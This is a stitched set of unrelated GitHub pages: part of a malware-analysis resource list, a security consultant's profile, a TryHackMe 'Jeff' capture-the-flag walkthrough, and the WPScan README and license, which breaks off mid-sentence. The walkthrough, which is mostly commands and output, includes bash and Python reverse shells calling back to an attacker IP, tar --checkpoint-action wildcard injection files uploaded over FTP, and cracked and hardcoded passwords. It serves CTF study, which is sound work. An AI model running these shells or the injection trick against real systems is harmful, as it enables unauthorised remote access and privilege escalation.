Software. * [Practical Reverse Engineering](https://www.amzn.com/dp/1118787315/) - Intermediate Reverse Engineering. * [Real Digital Forensics](https://www.amzn.com/dp/0321240693) - Computer Security and Incident Response. * [Rootkits and Bootkits](https://www.amazon.com/dp/1593277164) - Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats * [The Art of Memory Forensics](https://amzn.com/dp/1118825098) - Detecting Malware and Threats in Windows, Linux, and Mac Memory. * [The IDA Pro Book](https://amzn.com/dp/1593272898) - The Unofficial Guide to the World's Most Popular Disassembler. * [The Rootkit Arsenal](https://amzn.com/dp/144962636X) - The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System ## Other * [APT Notes](https://github.com/aptnotes/data) - A collection of papers and notes related to Advanced Persistent Threats. * [Ember](https://github.com/endgameinc/ember) - Endgame Malware BEnchmark for Research, a repository that makes it easy to (re)create a machine learning model that can be used to predict a score for a PE file based on static analysis. * [File Formats posters](https://github.com/corkami/pics) - Nice visualization of commonly used file format (including PE & ELF). * [Honeynet Project](http://honeynet.org/) - Honeypot tools, papers, and other resources. * [Kernel Mode](http://www.kernelmode.info/forum/) - An active community devoted to malware analysis and kernel development. * [Malicious Software](https://zeltser.com/malicious-software/) - Malware blog and resources by Lenny Zeltser. * [Malware Analysis Search](https://cse.google.com/cse/home?cx=011750002002865445766%3Apc60zx1rliu) - Custom Google search engine from [Corey Harrell](journeyintoir.blogspot.com/). * [Malware Analysis Tutorials](http://fumalwareanalysis.blogspot.nl/p/malware-analysis-tutorials-reverse.html) - The Malware Analysis Tutorials by Dr. Xiang Fu, a great resource for learning practical malware analysis. * [Malware Analysis, Threat Intelligence and Reverse Engineering](https://www.slideshare.net/bartblaze/malware-analysis-threat-intelligence-and-reverse-engineering) - Presentation introducing the concepts of malware analysis, threat intelligence and reverse engineering. Experience or prior knowledge is not required. Labs link in description. * [Malware Persistence](https://github.com/Karneades/malware-persistence) - Collection of various information focused on malware persistence: detection (techniques), response, pitfalls and the log collection (tools). * [Malware Samples and Traffic](http://malware-traffic-analysis.net/) - This blog focuses on network traffic related to malware infections. * [Malware Search+++](https://addons.mozilla.org/fr/firefox/addon/malware-search-plusplusplus/) Firefox extension allows you to easily search some of the most popular malware databases * [Practical Malware Analysis Starter Kit](https://bluesoul.me/practical-malware-analysis-starter-kit/) - This package contains most of the software referenced in the Practical Malware Analysis book. * [RPISEC Malware Analysis](https://github.com/RPISEC/Malware) - These are the course materials used in the Malware Analysis course at at Rensselaer Polytechnic Institute during Fall 2015. * [WindowsIR: Malware](http://windowsir.blogspot.com/p/malware.html) - Harlan Carvey's page on Malware. * [Windows Registry specification](https://github.com/msuhanov/regf/blob/master/Windows%20registry%20file%20format%20specification.md) - Windows registry file format specification. * [/r/csirt_tools](https://www.reddit.com/r/csirt_tools/) - Subreddit for CSIRT tools and resources, with a [malware analysis](https://www.reddit.com/r/csirt_tools/search?q=flair%3A%22Malware%20analysis%22&sort=new&restrict_sr=on) flair. * [/r/Malware](https://www.reddit.com/r/Malware) - The malware subreddit. * [/r/ReverseEngineering](https://www.reddit.com/r/ReverseEngineering) - Reverse engineering subreddit, not limited to just malware. # Related Awesome Lists * [Android Security](https://github.com/ashishb/android-security-awesome) * [AppSec](https://github.com/paragonie/awesome-appsec) * [CTFs](https://github.com/apsdehal/awesome-ctf) * [Forensics](https://github.com/Cugu/awesome-forensics) * ["Hacking"](https://github.com/carpedm20/awesome-hacking) * [Honeypots](https://github.com/paralax/awesome-honeypots) * [Industrial Control System Security](https://github.com/hslatman/awesome-industrial-control-system-security) * [Incident-Response](https://github.com/meirwah/awesome-incident-response) * [Infosec](https://github.com/onlurking/awesome-infosec) * [PCAP Tools](https://github.com/caesar0301/awesome-pcaptools) * [Pentesting](https://github.com/enaqx/awesome-pentest) * [Security](https://github.com/sbilly/awesome-security) * [Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence) * [YARA](https://github.com/InQuest/awesome-yara) # [Contributing](CONTRIBUTING.md) Pull requests and issues with suggestions are welcome! Please read the [CONTRIBUTING](CONTRIBUTING.md) guidelines before submitting a PR. # Thanks This list was made possible by: * Lenny Zeltser and other contributors for developing REMnux, where I found many of the tools in this list; * Michail Hale Ligh, Steven Adair, Blake Hartstein, and Mather Richard for writing the *Malware Analyst's Cookbook*, which was a big inspiration for creating the list; * And everyone else who has sent pull requests or suggested links to add here! Thanks!
<p align="center"> <img src="https://user-images.githubusercontent.com/63926014/209046028-a851de73-fcf5-4cf3-a7bd-297148f5d986.png"> Hey, I'm E.T. I'm a cybersecurity consultant with experience & interests in security compliance, cloud security, and penetration testing. <br> <img src="https://user-images.githubusercontent.com/63926014/235801128-0e5d0e65-f8d7-459a-a873-10366cf6d72d.svg"> <br> <a href="https://app.hackthebox.com/profile/339226"> <img src="https://www.hackthebox.com/badge/image/339226"></a> </p> <h2>๐Ÿ”— Links</h2> - https://ethantroy.com/ - Personal Blog <br> - https://hacks.ethantroy.com/ - Anything hacking realted, Hack The Box, Try Hack Me, Security Related Blogs <br> - https://medium.com/@ethanolivertroy - My medium page; a mix of cybersecurity and fitness/nutrition <br> - https://www.youtube.com/@ethanolivertroy - Youtube Channel <br> - https://mycyberdictionary.com/ - Just like it sounds, I dumped my cyber brain out to the public <h2>๐Ÿงช Projects</h2> <p align="center"> <img src="https://github.com/ethanolivertroy/ethanolivertroy/assets/63926014/6c83ab15-4870-4755-9239-1d57d6c8745e" width="500"> <br> <span style="display:block"> <a href="https://github.com/ethanolivertroy/nessus-vuln-management-lab/wiki">Tenable Nessus Vulnerability Management Lab</a> </span> </p> <p align="center"> <img src="https://github.com/ethanolivertroy/ethanolivertroy/assets/63926014/06f817e7-fd56-4902-a80f-2a1dfe9a2db6" width="500"> <br> <span style="display:block"> <a href="https://github.com/ethanolivertroy/nmap-GPT">NMAP-GPT</a> </span> </p> <p align="center"> <a href="https://youtu.be/2cChiGcnnUs"> <img src="https://github.com/ethanolivertroy/ethanolivertroy/assets/63926014/8b907a46-3097-4acc-a18c-f0f1355aa70d" width="500"> </a> <br> <span style="display:block"><a href="https://youtu.be/2cChiGcnnUs">flAWS.cloud Cloud Security Misconfigurations Walkthrough 2023</a></span> </p> <h2>๐Ÿ› ๏ธ What I'm Currently Working On</h2> <p align="center"> <a href="https://mycyberdictionary.com/"> <img src="https://github.com/ethanolivertroy/ethanolivertroy/assets/63926014/2084a3c6-97f7-425c-8e70-4ef3a13782e5" width="700"> <br> <span style="display:block">My Cyber Dictionary</span> </a> </p> <p align="center"> <a href="https://learntocloud.guide/"> <img src="https://github.com/ethanolivertroy/ethanolivertroy/assets/63926014/eb162562-d581-40c1-937b-907833530fe0" width="700"> <br> <span style="display:block">Learn to Cloud Guide: Cloud Security Projects</span> </a> </p>
# Jeff Can you hack Jeff's web server? - [Jeff](https://tryhackme.com/room/jeff) ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Task 1 Get Root This machine may take upto 5 minutes to fully deploy. Get user.txt and root.txt. This is my first ever box, I hope you enjoy it. If you find yourself brute forcing SSH, you're doing it wrong. Please don't post spoilers or stream the box for at least a couple of days. ``` kali@kali:~/CTFs/tryhackme/Jeff$ sudo nmap -A -sS -sC -sV -Pn -O 10.10.8.137 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-17 13:12 CEST Nmap scan report for 10.10.8.137 Host is up (0.035s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 7e:43:5f:1e:58:a8:fc:c9:f7:fd:4b:40:0b:83:79:32 (RSA) | 256 5c:79:92:dd:e9:d1:46:50:70:f0:34:62:26:f0:69:39 (ECDSA) |_ 256 ce:d9:82:2b:69:5f:82:d0:f5:5c:9b:3e:be:76:88:c3 (ED25519) 80/tcp open http nginx |_http-title: Site doesn't have a title (text/html). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%), Infomir MAG-250 set-top box (86%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (86%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 35.69 ms 10.8.0.1 2 35.54 ms 10.10.8.137 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.51 seconds ``` ``` kali@kali:~/CTFs/tryhackme/Jeff$ gobuster dir -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://jeff.thm [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/17 13:14:30 Starting gobuster =============================================================== /admin (Status: 301) /assets (Status: 301) /backups (Status: 301) /index.html (Status: 200) /uploads (Status: 301) =============================================================== 2020/10/17 13:14:47 Finished =============================================================== ``` ``` kali@kali:~/CTFs/tryhackme/Jeff$ gobuster dir -u http://jeff.thm/admin/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://jeff.thm/admin/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: zip,bak,old,php [+] Timeout: 10s =============================================================== 2020/10/17 13:14:42 Starting gobuster =============================================================== /index.html (Status: 200) /login.php (Status: 200) =============================================================== 2020/10/17 13:16:07 Finished =============================================================== ``` ``` kali@kali:~/CTFs/tryhackme/Jeff$ gobuster dir -u http://jeff.thm/backups/ -x zip,bak,old,php -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://jeff.thm/backups/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: zip,bak,old,php [+] Timeout: 10s =============================================================== 2020/10/17 13:18:02 Starting gobuster =============================================================== /backup.zip (Status: 200) /index.html (Status: 200) Progress: 2317 / 4615 (50.21%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2020/10/17 13:18:56 Finished =============================================================== ``` ``` kali@kali:~/CTFs/tryhackme/Jeff$ zipinfo backup.zip Archive: backup.zip Zip file size: 62753 bytes, number of entries: 9 drwxrwx--- 3.0 unx 0 bx stor 20-May-14 17:20 backup/ drwxrwx--- 3.0 unx 0 bx stor 20-May-14 17:20 backup/assets/ -rwxrwx--- 3.0 unx 34858 TX defN 20-May-14 17:20 backup/assets/EnlighterJS.min.css -rwxrwx--- 3.0 unx 49963 TX defN 20-May-14 17:20 backup/assets/EnlighterJS.min.js -rwxrwx--- 3.0 unx 89614 TX defN 20-May-14 17:20 backup/assets/MooTools-Core-1.6.0-compressed.js -rwxrwx--- 3.0 unx 11524 BX defN 20-May-14 17:20 backup/assets/profile.jpg -rwxrwx--- 3.0 unx 1439 TX defN 20-May-14 17:20 backup/assets/style.css -rwxrwx--- 3.0 unx 1178 TX defN 20-May-14 17:20 backup/index.html -rwxrwx--- 3.0 unx 41 TX stor 20-May-14 17:20 backup/wpadmin.bak 9 files, 188617 bytes uncompressed, 60951 bytes compressed: 67.7% kali@kali:~/CTFs/tryhackme/Jeff$ zip2john backup.zip > backup.hash backup.zip/backup/ is not encrypted! backup.zip/backup/assets/ is not encrypted! ver 1.0 backup.zip/backup/ is not encrypted, or stored with non-handled compression type ver 1.0 backup.zip/backup/assets/ is not encrypted, or stored with non-handled compression type ver 2.0 efh 5455 efh 7875 backup.zip/backup/assets/EnlighterJS.min.css PKZIP Encr: 2b chk, TS_chk, cmplen=6483, decmplen=34858, crc=541FD3B0 ver 2.0 efh 5455 efh 7875 backup.zip/backup/assets/EnlighterJS.min.js PKZIP Encr: 2b chk, TS_chk, cmplen=14499, decmplen=49963, crc=545D786A ver 2.0 efh 5455 efh 7875 backup.zip/backup/assets/MooTools-Core-1.6.0-compressed.js PKZIP Encr: 2b chk, TS_chk, cmplen=27902, decmplen=89614, crc=43D2FC37 ver 2.0 efh 5455 efh 7875 backup.zip/backup/assets/profile.jpg PKZIP Encr: 2b chk, TS_chk, cmplen=10771, decmplen=11524, crc=F052E57A ver 2.0 efh 5455 efh 7875 backup.zip/backup/assets/style.css PKZIP Encr: 2b chk, TS_chk, cmplen=675, decmplen=1439, crc=9BA0C7C1 ver 2.0 efh 5455 efh 7875 backup.zip/backup/index.html PKZIP Encr: 2b chk, TS_chk, cmplen=652, decmplen=1178, crc=39D2DBFF ver 1.0 efh 5455 efh 7875 backup.zip/backup/wpadmin.bak PKZIP Encr: 2b chk, TS_chk, cmplen=53, decmplen=41, crc=FAECFEFB NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, use option -o to pick a file at a time. kali@kali:~/CTFs/tryhackme/Jeff$ john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status !!Burningbird!! (backup.zip) 1g 0:00:00:04 DONE (2020-10-17 13:21) 0.2036g/s 2920Kp/s 2920Kc/s 2920KC/s !!rebound!!..*7ยกVamos! Use the "--show" option to display all of the cracked passwords reliably Session completed ``` ``` kali@kali:~/CTFs/tryhackme/Jeff$ cat backup/wpadmin.bak wordpress password is: phO#g)C5dhIWZn3BKP ``` ``` kali@kali:~/CTFs/tryhackme/Jeff$ gobuster vhost -u http://jeff.thm -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://jeff.thm [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/17 13:23:32 Starting gobuster =============================================================== Found: wordpress.jeff.thm (Status: 200) [Size: 25901] =============================================================== 2020/10/17 13:23:51 Finished =============================================================== kali@kali:~/CTFs/tryhackme/Jeff$ sudo nano /etc/hosts ``` ``` kali@kali:~/CTFs/tryhackme/Jeff$ wpscan --url http://wordpress.jeff.thm -e u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ยฎ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N]Y [i] Updating the Database ... [i] Update completed. [+] URL: http://wordpress.jeff.thm/ [10.10.8.137] [+] Started: Sat Oct 17 13:25:32 2020 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: nginx | - X-Powered-By: PHP/7.3.17 | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://wordpress.jeff.thm/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://wordpress.jeff.thm/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://wordpress.jeff.thm/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4.1 identified (Insecure, released on 2020-04-29). | Found By: Rss Generator (Passive Detection) | - http://wordpress.jeff.thm/?feed=rss2, <generator>https://wordpress.org/?v=5.4.1</generator> | - http://wordpress.jeff.thm/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.4.1</generator> [+] WordPress theme in use: twentytwenty | Location: http://wordpress.jeff.thm/wp-content/themes/twentytwenty/ | Last Updated: 2020-08-11T00:00:00.000Z | Readme: http://wordpress.jeff.thm/wp-content/themes/twentytwenty/readme.txt | [!] The version is out of date, the latest version is 1.5 | Style URL: http://wordpress.jeff.thm/wp-content/themes/twentytwenty/style.css?ver=1.2 | Style Name: Twenty Twenty | Style URI: https://wordpress.org/themes/twentytwenty/ | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://wordpress.jeff.thm/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2' [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <===================================================================================================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] jeff | Found By: Author Posts - Display Name (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Sat Oct 17 13:25:42 2020 [+] Requests Done: 60 [+] Cached Requests: 6 [+] Data Sent: 12.886 KB [+] Data Received: 12.99 MB [+] Memory used: 177.816 MB [+] Elapsed time: 00:00:10 ``` `exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.106.222/9001 0>&1'");` ``` www-data@Jeff:/var/www/html$ ls -la ls -la total 228 drwxr-xr-x 5 www-data www-data 4096 Oct 17 11:12 . drwxr-xr-x 1 root root 4096 Apr 23 16:34 .. -rw-r--r-- 1 www-data www-data 261 May 14 16:54 .htaccess -rw-r--r-- 1 root root 575 May 18 11:57 ftp_backup.php -rw-r--r-- 1 www-data www-data 405 Feb 6 2020 index.php -rw-r--r-- 1 www-data www-data 19915 Feb 12 2020 license.txt -rw-r--r-- 1 www-data www-data 7278 Jan 10 2020 readme.html -rw-r--r-- 1 www-data www-data 6912 Feb 6 2020 wp-activate.php drwxr-xr-x 9 www-data www-data 4096 Apr 29 18:58 wp-admin -rw-r--r-- 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php -rw-r--r-- 1 www-data www-data 2275 Feb 6 2020 wp-comments-post.php -rw-r--r-- 1 www-data www-data 2823 Oct 17 11:12 wp-config-sample.php -rw-r--r-- 1 www-data www-data 3198 Oct 17 11:12 wp-config.php drwxr-xr-x 4 www-data www-data 4096 Oct 17 11:29 wp-content -rw-r--r-- 1 www-data www-data 3940 Feb 6 2020 wp-cron.php drwxr-xr-x 21 www-data www-data 12288 Apr 29 18:58 wp-includes -rw-r--r-- 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php -rw-r--r-- 1 www-data www-data 3300 Feb 6 2020 wp-load.php -rw-r--r-- 1 www-data www-data 47874 Feb 10 2020 wp-login.php -rw-r--r-- 1 www-data www-data 8509 Apr 14 2020 wp-mail.php -rw-r--r-- 1 www-data www-data 19396 Apr 10 2020 wp-settings.php -rw-r--r-- 1 www-data www-data 31111 Feb 6 2020 wp-signup.php -rw-r--r-- 1 www-data www-data 4755 Feb 6 2020 wp-trackback.php -rw-r--r-- 1 www-data www-data 3133 Feb 6 2020 xmlrpc.php ``` ``` www-data@Jeff:/var/www/html$ cat ftp_backup.php cat ftp_backup.php ``` ```php <?php /* Todo: I need to finish coding this database backup script. also maybe convert it to a wordpress plugin in the future. */ $dbFile = 'db_backup/backup.sql'; $ftpFile = 'backup.sql'; $username = "backupmgr"; $password = "SuperS1ckP4ssw0rd123!"; $ftp = ftp_connect("172.20.0.1"); // todo, set up /etc/hosts for the container host if( ! ftp_login($ftp, $username, $password) ){ die("FTP Login failed."); } $msg = "Upload failed"; if (ftp_put($ftp, $remote_file, $file, FTP_ASCII)) { $msg = "$file was uploaded.\n"; } echo $msg; ftp_close($conn_id); ``` ```py #!/usr/bin/env python3.7 from ftplib import FTP import io host = '172.20.0.1' username = "backupmgr" password = "SuperS1ckP4ssw0rd123!" ftp = FTP(host = host) login_status = ftp.login(user = username,passwd = password) print(login_status) ftp.set_pasv(False) ftp.cwd('files') print(ftp.dir()) shell = io.BytesIO(b'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.106.222",9002));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);') trash = io.BytesIO(b'') ftp.storlines('STOR shell.sh',shell) ftp.storlines('STOR --checkpoint=1',trash) ftp.storlines('STOR --checkpoint-action=exec=sh shell.sh',trash) ftp.dir() ftp.quit() ``` ``` www-data@Jeff:/tmp$ wget 10.8.106.222/shell.py wget 10.8.106.222/shell.py --2020-10-17 12:01:19-- http://10.8.106.222/shell.py Connecting to 10.8.106.222:80... connected. HTTP request sent, awaiting response... 200 OK Length: 739 [text/plain] Saving to: 'shell.py' 0K 100% 6.69M=0s 2020-10-17 12:01:19 (6.69 MB/s) - 'shell.py' saved [739/739] www-data@Jeff:/tmp$ chmod +x shell.py chmod +x shell.py www-data@Jeff:/tmp$ python3.7 shell.py python3.7 shell.py 230 Login successful. -rwxr-xr-x 1 1001 1001 0 Oct 17 11:59 --checkpoint-action=exec=sh shell.sh -rwxr-xr-x 1 1001 1001 0 Oct 17 11:59 --checkpoint=1 -rwxr-xr-x 1 1001 1001 228 Oct 17 11:59 shell.sh None -rwxr-xr-x 1 1001 1001 0 Oct 17 12:01 --checkpoint-action=exec=sh shell.sh -rwxr-xr-x 1 1001 1001 0 Oct 17 12:01 --checkpoint=1 -rwxr-xr-x 1 1001 1001 228 Oct 17 12:01 shell.sh www-data@Jeff:/tmp$ ``` `curl -P - 'ftp://backupmgr:[email protected]/files/' -s` ``` echo "python3.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.106.222\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'" > shell.sh echo "" > "/tmp/--checkpoint=1" echo "" > "/tmp/--checkpoint-action=exec=sh shell.sh" And now, letโ€™s upload them to the remote location: curl -v -P - -T "/tmp/shell.sh" 'ftp://backupmgr:[email protected]/files/' curl -v -P - -T "/tmp/--checkpoint=1" 'ftp://backupmgr:[email protected]/files/' curl -v -P - -T "/tmp/--checkpoint-action=exec=sh shell.sh" 'ftp://backupmgr:[email protected]/files/' ``` 1. Hack the machine and obtain the user.txt flag. 2. Escalate your privileges, whats the root flag?
<p align="center"> <a href="https://wpscan.org/"> <img src="https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png" alt="WPScan logo"> </a> </p> <h3 align="center">WPScan</h3> <p align="center"> WordPress Vulnerability Scanner <br> <br> <a href="https://wpscan.org/" title="homepage" target="_blank">Homepage</a> - <a href="https://wpscan.io/" title="wpscan.io" target="_blank">WPScan.io</a> - <a href="https://wpvulndb.com/" title="vulnerability database" target="_blank">Vulnerability Database</a> - <a href="https://wordpress.org/plugins/wpscan/" title="wordpress plugin" target="_blank">WordPress Plugin</a> </p> <p align="center"> <a href="https://badge.fury.io/rb/wpscan" target="_blank"><img src="https://badge.fury.io/rb/wpscan.svg"></a> <a href="https://github.com/wpscanteam/wpscan/actions?query=workflow%3ABuild" target="_blank"><img src="https://github.com/wpscanteam/wpscan/workflows/Build/badge.svg"></a> <a href="https://codeclimate.com/github/wpscanteam/wpscan" target="_blank"><img src="https://codeclimate.com/github/wpscanteam/wpscan/badges/gpa.svg"></a> </p> # INSTALL ## Prerequisites - (Optional but highly recommended: [RVM](https://rvm.io/rvm/install)) - Ruby >= 2.3 - Recommended: latest - Ruby 2.5.0 to 2.5.3 can cause an 'undefined symbol: rmpd_util_str_to_d' error in some systems, see [#1283](https://github.com/wpscanteam/wpscan/issues/1283) - Curl >= 7.21 - Recommended: latest - The 7.29 has a segfault - RubyGems - Recommended: latest - Nokogiri might require packages to be installed via your package manager depending on your OS, see https://nokogiri.org/tutorials/installing_nokogiri.html ### From RubyGems (Recommended) ```shell gem install wpscan ``` On MacOSX, if a ```Gem::FilePermissionError``` is raised due to the Apple's System Integrity Protection (SIP), either install RVM and install wpscan again, or run ```sudo gem install -n /usr/local/bin wpscan``` (see [#1286](https://github.com/wpscanteam/wpscan/issues/1286)) ### From sources (NOT Recommended) Prerequisites: Git ```shell git clone https://github.com/wpscanteam/wpscan cd wpscan/ bundle install && rake install ``` # Updating You can update the local database by using ```wpscan --update``` Updating WPScan itself is either done via ```gem update wpscan``` or the packages manager (this is quite important for distributions such as in Kali Linux: ```apt-get update && apt-get upgrade```) depending how WPScan was (pre)installed # Docker Pull the repo with ```docker pull wpscanteam/wpscan``` Enumerating usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # Usage ```wpscan --url blog.tld``` This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then ```wpscan --stealthy --url blog.tld``` can be used. As a result, when using the ```--enumerate``` option, don't forget to set the ```--plugins-detection``` accordingly, as its default is 'passive'. For more options, open a terminal and type ```wpscan --help``` (if you built wpscan from the source, you should type the command outside of the git repo) The DB is located at ~/.wpscan/db ## Vulnerability Database The WPScan CLI tool uses the [WPVulnDB API](https://wpvulndb.com/api) to retrieve WordPress vulnerability data in real time. For WPScan to retrieve the vulnerability data an API token must be supplied via the `--api-token` option, or via a configuration file, as discussed below. An API token can be obtained by registering an account on [WPVulnDB](https://wpvulndb.com/users/sign_up). Up to 50 API requests per day are given free of charge to registered users. Once the 50 API requests are exhausted, WPScan will continue to work as normal but without any vulnerability data. Users can upgrade to paid API usage to increase their API limits within their user profile on [WPVulnDB](https://wpvulndb.com/). ## Load CLI options from file/s WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last): - ~/.wpscan/scan.json - ~/.wpscan/scan.yml - pwd/.wpscan/scan.json - pwd/.wpscan/scan.yml If those files exist, options from the `cli_options` key will be loaded and overridden if found twice. e.g: ~/.wpscan/scan.yml: ```yml cli_options: proxy: 'http://127.0.0.1:8080' verbose: true ``` pwd/.wpscan/scan.yml: ```yml cli_options: proxy: 'socks5://127.0.0.1:9090' url: 'http://target.tld' ``` Running ```wpscan``` in the current directory (pwd), is the same as ```wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld``` ## Save API Token in a file The feature mentioned above is useful to keep the API Token in a config file and not have to supply it via the CLI each time. To do so, create the ~/.wpscan/scan.yml file containing the below: ```yml cli_options: api_token: YOUR_API_TOKEN ``` ## Load API Token From ENV (since v3.7.10) The API Token will be automatically loaded from the ENV variable `WPSCAN_API_TOKEN` if present. If the `--api-token` CLI option is also provided, the value from the CLI will be used. ## Enumerating usernames ```shell wpscan --url https://target.tld/ --enumerate u ``` Enumerating a range of usernames ```shell wpscan --url https://target.tld/ --enumerate u1-100 ``` ** replace u1-100 with a range of your choice. # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2019 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScanโ€™s core developers. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - [email protected]. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the 